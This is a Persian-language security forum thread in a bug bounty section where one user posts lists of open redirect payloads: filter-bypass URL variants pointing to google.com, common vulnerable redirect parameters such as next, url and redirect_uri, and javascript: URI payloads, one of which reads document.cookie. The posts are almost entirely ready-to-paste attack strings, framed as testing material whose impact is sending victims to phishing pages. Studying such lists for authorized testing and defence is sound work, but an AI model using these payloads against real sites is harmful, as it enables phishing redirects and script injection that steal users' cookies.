انجمن تیم امنیتی ایران سایبر

آسیب پذیری Open Redirect در باگ بانتی (bug Bounty)

شروع موضوع توسط 1314CK.0FF3NSIV3 ‏1/1/20 در انجمن باگ بانتی (Bug Bounty)

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

حامی مسابقات و برگزار کننده دوره های پیشرفته ارزیابی امنیت برای سازمان ها فتح پرچم (CTF)
برچسب ها:
  1. 1314CK.0FF3NSIV3

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏16/8/15
    ارسال ها:
    16
    تشکر شده:
    38
    جنسیت:
    Name:
    Nothing
    Main os:
    Ubuntu
    باسلام

    از آسیب پذیری ها آسیب پذیری Open Redirect که مهاجم با متد های خلاقانه تر برای تست استفاده کند در هر پست به چند مورد خاص اشاره می کنم که با این نوع Open Redirect ها هم برای تست آشنایی لازم را پیدا کنید که در Impact گزارش به ریدارکت شدن قربانی به malicious page ها یا صفحات فیشینگ می توان اشاره کرد.

    چند نمونه Open Redirect :

    کد:
    ////%09/google.com
    ///%09/google.com
    //%09/google.com
    /%09/google.com
    /%09/javascript:alert(1);
    /%09/javascript:alert(1)
    http://;@google.com
    http://.google.com
    http://google.com
    http:/\/\google.com
    http:/google.com
    http:google.com
    http://google.com%23.whitelisted.com/
    http://google.com%2f%2f.whitelisted.com/
    http://google.com%3F.whitelisted.com/
    http://google.com%5c%5c.whitelisted.com/
    http://google.com:[email protected]/
    http://google.com:80#@whitelisted.com/
    http://google.com\twhitelisted.com/
    /https://%09/google.com
    https://%09/google.com
    //https://[email protected]//
    /https://[email protected]/
    https://whitelisted.com;@google.com
    https://whitelisted.com.google.com
    https://[email protected]//
    https://[email protected]/
    https://[email protected]
    /https://[email protected]/%2e%2e
    https:///[email protected]/%2e%2e
    //https://[email protected]/%2e%2e%2f
    https://[email protected]/%2e%2e%2f
    /https://[email protected]/%2f..
    https://[email protected]/%2f..
    /https:///[email protected]/%2f%2e%2e
    /https://[email protected]/%2f%2e%2e
    https:///[email protected]/%2f%2e%2e
    https://[email protected]/%2f%2e%2e
    /https://[email protected]/%2f.//[email protected]/%2f..
    https://whitelisted.com/https://google.com/
    @https://www.google.com
    http://[email protected]
    http:[email protected]
    http://[email protected]
    http:[email protected]
    http://[email protected]
    http:[email protected]
    http://[email protected]
    http:[email protected]
    http://[email protected]
    http:[email protected]
    http://[email protected]
    http:[email protected]
    http://[email protected]
    /https://%5cgoogle.com
    /https:google.com
    https://////google.com
    https://google.com//
    https://google.com/
    https://google.com
    https:/\google.com
    https:google.com
    //https:///google.com/%2e%2e
    /https://google.com/%2e%2e
    https:///google.com/%2e%2e
    //https://google.com/%2e%2e%2f
    https://google.com/%2e%2e%2f
    /https://google.com/%2f..
    https://google.com/%2f..
    /https:///google.com/%2f%2e%2e
    /https://google.com/%2f%2e%2e
    https:///google.com/%2f%2e%2e
    https://google.com/%2f%2e%2e
    https://:@google.com\@whitelisted.com
    https://google.com?whitelisted.com
    https://google.com/whitelisted.com
    https://google.com\whitelisted.com
    https://google.com#whitelisted.com
    https://google%E3%80%82com
    /https:/%5cgoogle.com/
    https://%5cgoogle.com
    https:/%5cgoogle.com/
    /https://%5cw[email protected]
    https://%[email protected]
    https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
    //https://google.com//
    /https://google.com//
    /https://google.com/
    /https://google.com
    /https:google.com
    https://////google.com
    https://google.com//

    تاپیک در جلسات بعدی تکمیل تر می شود .
     
    blackops و Ruiner از این پست تشکر کرده اند.
  2. 1314CK.0FF3NSIV3

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏16/8/15
    ارسال ها:
    16
    تشکر شده:
    38
    جنسیت:
    Name:
    Nothing
    Main os:
    Ubuntu
    لیست دیگر برای شما عزیزان
    فقط کافیه انتهای آدرس هایی که احساس می کنید قابل ریدارکت شدن را دارند وارد کنید .
    چند نمونه پارامترهای آسیب پذیر رو برای روشن شدن مطلب :
    کد:
    /{payload}
    ?next={payload}
    ?url={payload}
    ?target={payload}
    ?rurl={payload}
    ?dest={payload}
    ?destination={payload}
    ?redir={payload}
    ?redirect_uri={payload}
    ?redirect_url={payload}
    ?redirect={payload}
    /redirect/{payload}
    /cgi-bin/redirect.cgi?{payload}
    /out/{payload}
    /out?{payload}
    ?view={payload}
    /login?to={payload}
    ?image_url={payload}
    ?go={payload}
    ?return={payload}
    ?returnTo={payload}
    ?return_to={payload}
    ?checkout_url={payload}
    ?continue={payload}
    ?return_path={payload}

    حال کافیه پیلوت های زیر رو به پارامتر هایی چند نمونشو که در بالا اشاره میتونید اضافه کنید :

    کد:
    ////[email protected]//
    ////[email protected]/
    ///[email protected]//
    ///[email protected]/
    //[email protected]//
    //[email protected]/
    target;@google.com
    target.google.com
    ////[email protected]/%2e%2e
    ///[email protected]/%2e%2e
    ////[email protected]/%2e%2e%2f
    ///[email protected]/%2e%2e%2f
    //[email protected]/%2e%2e%2f
    ////[email protected]/%2f..
    ///[email protected]/%2f..
    //[email protected]/%2f..
    ////[email protected]/%2f%2e%2e
    ///[email protected]/%2f%2e%2e
    //[email protected]/%2f%2e%2e
    http://target>.7d8T\[email protected]@google.com/
    http://target>.7d8T\[email protected][email protected]/
    ja\nva\tscript\r:alert(1)
    java%09script:alert(1)
    java%0ascript:alert(1)
    java%0d%0ascript%0d%0a:alert(0)
    java%0dscript:alert(1)
    Javas%26%2399;ript:alert(1)
    javascript://%0aalert(1)
    <>javascript:alert(1);
    //javascript:alert(1);
    //javascript:alert(1)
    /javascript:alert(1);
    /javascript:alert(1)
    \j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
    javascript:alert(1);
    javascript:alert(1)
    javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
    javascript:confirm(1)
    javascript://https://target/?z=%0Aalert(1)
    javascript:prompt(1)
    jaVAscript://target//%0d%0aalert(1);//
    javascript://target?%a0alert%281%29
    /https://[email protected]/
    https://target;@google.com
    https://target.google.com
    https://[email protected]//
    https://[email protected]/
    https://[email protected]
    /https://[email protected]/%2e%2e
    https:///[email protected]/%2e%2e
    //https://[email protected]/%2e%2e%2f
    https://[email protected]/%2e%2e%2f
    /https://[email protected]/%2f..
    https://[email protected]/%2f..
    /https:///[email protected]/%2f%2e%2e
    /https://[email protected]/%2f%2e%2e
    https:///[email protected]/%2f%2e%2e
    https://[email protected]/%2f%2e%2e
    http://[email protected]
    http:[email protected]
    http://[email protected]
    http:[email protected]
    http://[email protected]
    http:[email protected]
    http://[email protected]
    http:[email protected]
    http://[email protected]
    http:[email protected]
    http://[email protected]
    http:[email protected]
    http://[email protected]
    http:[email protected]
    http://[email protected]
    http:[email protected]
    http://[email protected][::10.0.0.1]
    http:[email protected][::10.0.0.1]
    اگر متوجه نشدین بیشتر توضیح بدم ...
     
    blackops و Ruiner از این پست تشکر کرده اند.
بارگذاری...

کاربرانی که از تاپیک دیدن کرده اند (کل: 15)

  1. duty
  2. 6124
  3. Enetpropo
  4. blackops
  5. Ruiner
  6. 1314CK.0FF3NSIV3
  7. FuzzyFord
  8. Juaninator
  9. sohp
  10. Monocots57
  11. SW4NG
  12. DawnInAllah
  13. AliTNT
  14. hackerman1
  15. Unkn0wn
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .